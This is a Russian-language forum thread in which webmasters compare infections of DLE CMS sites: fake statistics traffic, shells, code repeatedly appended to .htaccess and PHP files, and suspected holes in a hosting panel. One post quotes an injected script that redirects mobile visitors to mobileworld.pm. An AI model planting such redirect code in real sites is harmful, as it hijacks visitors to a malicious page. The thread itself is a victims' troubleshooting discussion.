Вирус на сайте cms dle

Не хотел обидеть, но и вы сразу бы сказали, что смотрели переходы по LI статистике.

Подобные накрутки статистики LI уже встречались.

Не думаю, что имело место реального перехода на этот сайт с ваших.

Но если это так, то надо писать в LI и требовать разъяснений.

Редирект возможен только при изменении ява скрипта.

Вот и коммент от ЛИ

модератор исключил сайт из рейтинга и запретил просмотр статистики, причина: накрутка (автоматическая загрузка при просмотре другого сайта)

Но как это было сделано остается пока загадкой.(возможно были инициированы переходы на магазиноблачный сайт с вашими ложными реферерами)

Значит, видимо, получается так:

Мы с вами и были теми посетителями, которые, удивленные переходами на непонятный сайт с нашего - посетили, посмотрели на "наглеца", а он получил реальных посетителей :)

проблема не у вас на сайтах, а у конечных пользователей, так как трафик сливается по давно отработанной системе, которую тестили еще в феврале/марте.

Тогда была аналогичная ситуация, только трафик сливался на 3-5 доменов с пустыми белыми страницами, на которых был только счетчик LI.

Смысл этой затеи был в следующем, пользователям ставились различные тулбары для браузеров, которые и стучали на указанные домены каждые 5-30 сек. Авторы тулюбаров таким образом отслеживали количество активных, среднее время в сети и тд.

Похоже кто-то решил аналогичным образом пустить трафик на раскрутку этого магазина.

PS если нужны будут списки доменов, куда лили раньше могу покопаться и найти, их 3-5 штук было.

---------- Добавлено 21.04.2013 в 04:55 ----------

ну и для того, что бы не быть голословным можете проверить трафик на своих сайтах на предмет сливов:

vkicq.ru 5 апреля

rurna.ru 30 марта

lucur.ru 29 марта

smmhit.ru 28 марта

clovla.ru 22 марта

dekounts.ru и тд

чем больше посещений на сайте тем больше вероятности увидеть эти домены в стате LI ... даная хрень в основном наблюдается в РУ сегменте...

---------- Добавлено 21.04.2013 в 05:30 ----------

подскажите лучше по поводу дле, так как морочу голову с этой фигней с 19 марта, скрипт дописывает по датам

19 марта, 23 марта, 27 марта, 4 и 12 апреля...

в апреле кроме дописывания кода в .htaccess

начали еще пихать 2 вида скрипта в php файлы:

проблема заключается в том, что пишут на два отдельных пакета хостинга (у одного хостера), при этом на одном пакете висит единственный сайт на kohana. На другом пакете дописывают в 1 DLE и 1 самописный. хотя на втором висят еще 4 сайта (3 на дле) и их не трогают.

ставил уже на .htaccess и 444 - все равно перезаписывают.

Первый раз на 3 сайтах нашел шелы, удалил, хостер даже расшифровал один из них. Но "дописи" продолжаются. Еще одна особенность заключается в том, что на хостинге стоит панель ISP и в ней, если редактивать файлы через файл менеджер в корне папки хостинга автоматом создается/меняется файл codepage. Так вот даты изменения этого файла строго совпадают с датой "дописывания".

Хостер включал 12 апреля логирование и сообщил, что дописывание происходит из ISP панели, типа смените основной пароль (я их не сохраняю в браузерах, и с 19 марта уже сменил раза 3). Единственное порекомендовали привязать IP входа в ISP.

Пообщался с рефами на хостинге, у них таже хрень в то же время была дописана. Соответственно ломают через какую-то дырку в панели самого хостера :(

если кому нужен на анлиз сам шел могу скинуть в шифрованном и нешифрованном виде.

MonkX

Меня ломали через модуль последние сообщения форума, ничего не помогало, пока не снёс его.

1 мая - 2 мая

файлы:

engine/init.php

engine/data/config.php

engine/data/dbconfig.php

index.php

language/Russian/website.lng

DLE 9.7 лицензия (1-го была без патча, 2-го пропатченная, не помогло)

На вышеуказанные файлы выставил жесткие права (до этого там был ппц с правами), сижу, бдю=) http://img.forumimg.net/smilies/popcorn1.gif

Боюсь против этой картинки вам ничего не поможет :(

Ну так я ж здесь выкладывал решение.

Обращайтесь помогу.

Тоже столкнулся с вот таким кодом на сайте:

<script type="text/javascript"><br><!--if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){ window.location="http://mobileworld.pm/l6/?sub_id=3349&dd_id=0"; } //-- </script>

Кстати у меня последний раз появился 6го мая.

Не могу понять откуда берется, раньше еще и в .htaccess мобильный редирект дописывался, но в него он писался при помощи пхп скрипта, как оказалось.

На хостинге тоже стоит ISP панель, в самом сайте дырок нету, совсем мало кода самописного и пролезть негде, но в аккаунте еще есть пару малопосещаемых сайтов на вордпресе и опенкарте, их вирус или не трогает или трогает частично. А вот посещаемый ресурс заражает обязательно.

Скажите, пожалуйста, мне в личку где вы хоститесь.

ЗЫ: вариант угона FTP практически исключен, так как после последнего заражения, все вычистил и пароли поменял, а спустя две недели вирус снова появился, хоть паролями я и не пользовался больше.

та же хрень была дописана 6 мая, отписался по возможным вариантом решения и о хостинге. У вас шаред пакет ?

Да я пока сам справляюсь, спасибо за предложение =)

Сегодня обратил внимание, что из addcomments.tpl был удалён код капчи, а так же в настройках группы "Пользователи" была выключена капча в комментариях

У меня обычный хостинг аккаунт из дешевых. Так что хостер не очень расположен вирусы искать. Когда просил поискать его этот mobileworld.pm в .htaccess файлах других аккаунтов, сказал что только у меня такое.